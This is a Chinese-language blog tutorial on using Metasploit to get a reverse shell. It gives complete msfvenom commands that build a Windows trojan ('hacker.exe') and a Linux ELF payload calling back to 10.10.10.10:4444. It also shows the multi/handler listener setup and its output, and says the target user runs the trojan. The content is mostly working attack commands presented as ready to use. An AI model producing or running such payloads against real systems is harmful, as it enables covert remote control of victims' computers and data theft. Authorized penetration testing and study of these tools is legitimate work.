Metasploit使用教程-(反弹shell)
Metasploit 反弹 shell
利用msfvenom生成一个反弹shell程序
msfvenom -l payloads可以查看所有payload
Windows 通用反向 shell:
windows/meterpreter/reverse --基于 TCP 的反向链接反弹 shell,使用起来很稳定。
windows/meterpreter/reverse_http --基于 http 方式的反向连接,在网速慢的情况下不稳定
windows/meterpreter/reverse_https --基于 https 方式的反向连接,在网速慢的情况下不稳定, https如果反弹没有收到数据,可以将监听端口换成 443 试试。
windows/meterpreter/bind_tcp --这是一个基于TCP的正向连接 shell,因为在内网跨网段时无法连接到attack的机器,所以在内网中经常会使用,不需要设置 LHOST。
生成 window 木马命令
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.10 lport=4444 -f exe -o D:\Test\tmp\hacker.exe
Linux 通用反向 shell:
linux/x86/meterpreter/reverse_tcp
linux/x86/shell_reverse_tcp
生成 linux 木马命令
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f elf -o /tmp/client_x64.bin
打开msfconsole创建侦察监听(根据上一步生成的木马类型选择payload)
msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 10.10.10.10
lhost => 10.10.10.10
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > run
[*] Started reverse TCP handler on 10.10.10.10:4444
目标用户运行hacker.exe,本地可成功连接。
本文作者:少年阿丁
本文链接:https://www.cnblogs.com/snad/p/17802793.html
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 单元测试从入门到精通